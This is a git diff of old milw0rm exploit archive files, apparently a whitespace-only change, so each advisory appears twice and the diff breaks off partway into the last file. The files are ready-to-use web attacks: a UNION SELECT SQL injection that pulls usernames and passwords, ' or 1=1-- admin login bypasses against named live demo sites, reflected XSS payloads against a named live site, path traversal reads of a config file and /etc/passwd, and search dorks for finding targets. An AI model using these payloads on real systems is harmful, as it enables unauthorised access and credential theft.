+
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>>
+
+ >>>> www.site.me/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--
+      
+ >>> demo ::: www.developiteasy.com/events_calendar/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--
+
+
+<<->> Exploit <<->> bypass <<->>
+ 
+        >>>> www.developiteasy.com/events_calendar/admin
+        
+        >>> user : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
+        
+        >>> pass : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
+
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> All freinds and all muslims
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7014.txt b/platforms/php/webapps/7014.txt
index e7cd58d5d..790253865 100755
--- a/platforms/php/webapps/7014.txt
+++ b/platforms/php/webapps/7014.txt
@@ -1,65 +1,64 @@
-
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-<> site : www.tryag.cc/cc
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-
-<<->> script      : News And Article System v1.4
-
-<<->> script site : www.developiteasy.com/news-and-article-system-v1.4-p-63.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13              
-
-
-
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit <<->>
-         
-        >>>> www.site.com/article_details.php?aid=[sql]
- 
-
-<<->> Exploit <<->> bypass <<->> in admin panel 
-       
-        >>>> www.developiteasy.com/article_system/admin
-        
-        >>> user : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
-        
-        >>> pass : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> All freinds and all muslims
-
-# milw0rm.com [2008-11-06]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+<> site : www.tryag.cc/cc
+
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+
+<<->> script      : News And Article System v1.4
+
+<<->> script site : www.developiteasy.com/news-and-article-system-v1.4-p-63.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13              
+
+
+
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit <<->>
+         
+        >>>> www.site.com/article_details.php?aid=[sql]
+ 
+
+<<->> Exploit <<->> bypass <<->> in admin panel 
+       
+        >>>> www.developiteasy.com/article_system/admin
+        
+        >>> user : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
+        
+        >>> pass : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> All freinds and all muslims
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7015.txt b/platforms/php/webapps/7015.txt
index f94fcde8f..c2a010774 100755
--- a/platforms/php/webapps/7015.txt
+++ b/platforms/php/webapps/7015.txt
@@ -1,69 +1,68 @@
-
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-<> site : www.tryag.cc/cc
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-
-<<->> script      : Membership System V1.3 
-
-<<->> script site : www.developiteasy.com/membership-system-v1.3-p-66.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13              
-
-
-
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit <<->> bypass <<->>
- 
-        >>>> www.developiteasy.com/membership_system/customer_login.php
-        
-        >>> user : cyb3r@1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
-        
-        >>> pass : cyb3r@1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
-
-
-<<->> Exploit <<->> bypass <<->> in admin panel 
-       
-        >>>> www.developiteasy.com/membership_system/admin
-        
-        >>> user : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
-        
-        >>> pass : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> All freinds and all muslims
-
-# milw0rm.com [2008-11-06]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+<> site : www.tryag.cc/cc
+
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+
+<<->> script      : Membership System V1.3 
+
+<<->> script site : www.developiteasy.com/membership-system-v1.3-p-66.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13              
+
+
+
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit <<->> bypass <<->>
+ 
+        >>>> www.developiteasy.com/membership_system/customer_login.php
+        
+        >>> user : cyb3r@1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
+        
+        >>> pass : cyb3r@1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
+
+
+<<->> Exploit <<->> bypass <<->> in admin panel 
+       
+        >>>> www.developiteasy.com/membership_system/admin
+        
+        >>> user : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
+        
+        >>> pass : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> All freinds and all muslims
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7016.txt b/platforms/php/webapps/7016.txt
index d8ef7e017..57760b9a3 100755
--- a/platforms/php/webapps/7016.txt
+++ b/platforms/php/webapps/7016.txt
@@ -1,66 +1,65 @@
-
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-<> site : www.tryag.cc/cc
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-
-<<->> script      : Photo Gallery v1.2
-
-<<->> script site : www.developiteasy.com/photo-gallery-v1.2-p-62.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13              
-
-
-
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit <<->>
-         
-        >>>> www.site.com/gallery_category.php?cat_id=[sql]
-        >>>> www.site.com/gallery_photo.php?photo_id=[sql]
-
-
-<<->> Exploit <<->> bypass <<->> in admin panel 
-       
-        >>>> www.developiteasy.com/photogallery/admin
-        
-        >>> user : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
-        
-        >>> pass : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> All freinds and all muslims
-
-# milw0rm.com [2008-11-06]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+<> site : www.tryag.cc/cc
+
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+
+<<->> script      : Photo Gallery v1.2
+
+<<->> script site : www.developiteasy.com/photo-gallery-v1.2-p-62.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13              
+
+
+
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit <<->>
+         
+        >>>> www.site.com/gallery_category.php?cat_id=[sql]
+        >>>> www.site.com/gallery_photo.php?photo_id=[sql]
+
+
+<<->> Exploit <<->> bypass <<->> in admin panel 
+       
+        >>>> www.developiteasy.com/photogallery/admin
+        
+        >>> user : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
+        
+        >>> pass : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> All freinds and all muslims
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7017.txt b/platforms/php/webapps/7017.txt
index ba9da3b82..83c8bd1fb 100755
--- a/platforms/php/webapps/7017.txt
+++ b/platforms/php/webapps/7017.txt
@@ -1,47 +1,47 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-                              IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-Pre ADS Portal <= 2.0 Multiple Vulnerabilities
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script:         	Pre ADS Portal
-[~] Language :         	PHP
-[~] Website[main]:     	http://www.preproject.com
-[~] Website[script]:    http://www.preproject.com/ads.asp
-[~] Type :             	Commercial
-[~] Report-Date :     	05/11/2008
-[~] Founder :			G4N0K 
-
-===============================================================================
-===[ Admin BYpass ]===
-[!] http://localhost/[path]/homeadmin/adminhome.php
-
-===[ Admin BYpass-LIVE ]===
-http://www.mideastbiz.com/homeadmin/adminhome.php
-
-
-
-===[ XSS ]===
-[!] http://localhost/[path]/homeadmin/adminhome.php?pg=1&msg=XSS
-[!] http://localhost/[path]/homeadmin/signinform.php?msg=XSS
-
-===[ XSS-LIVE ]===
-[!]http://www.mideastbiz.com/homeadmin/adminhome.php?pg=1&msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
-http://www.mideastbiz.com/homeadmin/signinform.php?msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
-
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800 
-[~] Hussain-X 
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-06]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                              IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Pre ADS Portal <= 2.0 Multiple Vulnerabilities
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script:         	Pre ADS Portal
+[~] Language :         	PHP
+[~] Website[main]:     	http://www.preproject.com
+[~] Website[script]:    http://www.preproject.com/ads.asp
+[~] Type :             	Commercial
+[~] Report-Date :     	05/11/2008
+[~] Founder :			G4N0K 
+
+===============================================================================
+===[ Admin BYpass ]===
+[!] http://localhost/[path]/homeadmin/adminhome.php
+
+===[ Admin BYpass-LIVE ]===
+http://www.mideastbiz.com/homeadmin/adminhome.php
+
+
+
+===[ XSS ]===
+[!] http://localhost/[path]/homeadmin/adminhome.php?pg=1&msg=XSS
+[!] http://localhost/[path]/homeadmin/signinform.php?msg=XSS
+
+===[ XSS-LIVE ]===
+[!]http://www.mideastbiz.com/homeadmin/adminhome.php?pg=1&msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
+http://www.mideastbiz.com/homeadmin/signinform.php?msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
+
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800 
+[~] Hussain-X 
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7018.txt b/platforms/php/webapps/7018.txt
index 840a5eb8f..2492f1c96 100755
--- a/platforms/php/webapps/7018.txt
+++ b/platforms/php/webapps/7018.txt
@@ -1,57 +1,57 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#- Nik-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz           #
-#        and all darkc0de and DarkTrix members               --# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com & darktrix.info
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title: NICE FAQ Script (Auth Bypass) SQl Injection Vulnerability
-# 
-# 
-###########################################################
-#
-# Script Vendor: http://www.nicephpscripts.com/PHP-FAQ-Script-Knowledgebase-Script.htm
-#
-###########################################################
- 
-     Go To Admin Panel :
-
-       Login With this information :
-
-	Admin : Admin
-
-	pass  : ' OR 1=1--
-
-
-    Live Demo : 
-
-	http://www.nicephpscripts.com/scripts/faqscript/admin/
-
-
-###########################################################
-#
-#  Bug discovered : 06 Nov 2008
-###########################################################
-
-# milw0rm.com [2008-11-06]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#- Nik-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz           #
+#        and all darkc0de and DarkTrix members               --# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com & darktrix.info
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title: NICE FAQ Script (Auth Bypass) SQl Injection Vulnerability
+# 
+# 
+###########################################################
+#
+# Script Vendor: http://www.nicephpscripts.com/PHP-FAQ-Script-Knowledgebase-Script.htm
+#
+###########################################################
+ 
+     Go To Admin Panel :
+
+       Login With this information :
+
+	Admin : Admin
+
+	pass  : ' OR 1=1--
+
+
+    Live Demo : 
+
+	http://www.nicephpscripts.com/scripts/faqscript/admin/
+
+
+###########################################################
+#
+#  Bug discovered : 06 Nov 2008
+###########################################################
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7019.txt b/platforms/php/webapps/7019.txt
index a4d8d0777..4fd381914 100755
--- a/platforms/php/webapps/7019.txt
+++ b/platforms/php/webapps/7019.txt
@@ -1,29 +1,29 @@
-#####################################################################################
-####                Arab Portal v2.1 Remote File Disclosure (Win32)              ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
-#Discovered by : R3d.W0rm (Sina Yazdanmehr)                                         #
-#Our Site : Http://IRCRASH.COM                                                      #
-#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
-#####################################################################################
-#                                                                                   #
-#Download : www.arabportal.net                                                      #
-#                                                                                   #
-#DORK : Powered by:   Arab Portal  inurl:mod.php?mod=html                           #
-#                                                                                   #
-#####################################################################################
-#                                       [Bug]                                       #
-#                                                                                   #
-#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\File.Type                 #
-#                                                                                   #
-#Config File :                                                                      #
-#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\..\..\admin\conf.php      #
-#                                                                                   #
-#Note : This bug only work on windows servers .                                     #
-#                                                                                   #
-#####################################################################################
-#                           Site : Http://IRCRASH.COM                               #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2008-11-06]
+#####################################################################################
+####                Arab Portal v2.1 Remote File Disclosure (Win32)              ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
+#Discovered by : R3d.W0rm (Sina Yazdanmehr)                                         #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
+#####################################################################################
+#                                                                                   #
+#Download : www.arabportal.net                                                      #
+#                                                                                   #
+#DORK : Powered by:   Arab Portal  inurl:mod.php?mod=html                           #
+#                                                                                   #
+#####################################################################################
+#                                       [Bug]                                       #
+#                                                                                   #
+#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\File.Type                 #
+#                                                                                   #
+#Config File :                                                                      #
+#http://Site/[path]/mod.php?mod=html&modfile=show&file=..\..\..\admin\conf.php      #
+#                                                                                   #
+#Note : This bug only work on windows servers .                                     #
+#                                                                                   #
+#####################################################################################
+#                           Site : Http://IRCRASH.COM                               #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/702.pl b/platforms/php/webapps/702.pl
index 441b19ad4..c59bdbac5 100755
--- a/platforms/php/webapps/702.pl
+++ b/platforms/php/webapps/702.pl
@@ -209,6 +209,6 @@ push(@d
 for my $d (@dirs) {
 DoDir($d);
 }
-}
-
-# milw0rm.com [2004-12-22]
+}
+
+# milw0rm.com [2004-12-22]
diff --git a/platforms/php/webapps/7020.txt b/platforms/php/webapps/7020.txt
index 5dd4f49fc..7e6b8db29 100755
--- a/platforms/php/webapps/7020.txt
+++ b/platforms/php/webapps/7020.txt
@@ -1,64 +1,64 @@
-##################################################################################
-#										 #		
-#		Author:	Vinod Sharma						 #
-#		Email:	vinodsharma.mimit@gmail.com				 #
-#		Date:	05th Nov, 2008						 #
-#		Note: 	This information is only for educational purpose, author # 
-#			will not bear responsibility for any damages. 		 #
-##################################################################################
-
-
-#########################################################################################
-#Directory traversal vulnerability in MySQL Quick Admin 1.5.5 				#
-#allows remote attackers to read and execute arbitrary files via a .. (dot dot) 	#
-#in the lang parameter to actions.php.							#
-#											#
-#											#
-#											#
-#Appplication still unpatched								#
-#											#
-#vulnerable code in actions.php								#
-# 											#				
-#/* code start										#
-#    case 27:										#
-#         $do = $_GET['do'];								#
-#         if($do == "theme" && file_exists("themes/".$_GET['theme'])){			#
-#             setcookie('theme', $_GET['theme'], time()+60*60*24*30);			#
-#             $_SESSION['theme'] = $_GET['theme'];					#
-#             unset($_SESSION['theme_name']);						#
-#         } else if($do == "lang" && file_exists("lang/".$_GET['lang'])){		#
-#             setcookie('language', $_GET['lang'], time()+60*60*24*30);			#
-#             $_SESSION['language'] = $_GET['lang'];					#
-#             unset($_SESSION['lang_name']);						#
-#         }										#
-#         header("Location: main.php");							#
-#											#
-#/* code end										#
-#											#	
-#$_SESSION['language'] is set to the value of the lang parameter without any 		#
-#sanitization.										#
-#											#
-#The actions.php will send this $_SESSION['language'] value to required.php which will 	#
-#pass it to include() function without any sanitization. 				#
-#											#
-#											#
-#vulnerable code in required.php							#
-#											#
-#/* code start 										#
-#											#
-#line 22 in required.php:  include("lang/".$_SESSION['language']."/lang.php");		#			
-#											#
-#/* code end										#
-#########################################################################################
-
-
-POC:http://www.example.com/quickadmin/actions.php?act=27&do=lang&lang=../../../../../../../../../../etc/passwd%00
-
-
-#########################################################################################
-#	references:									#
-#	http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454			#
-#	http://secunia.com/advisories/31820						#
-#########################################################################################
-
-# milw0rm.com [2008-11-06]
+##################################################################################
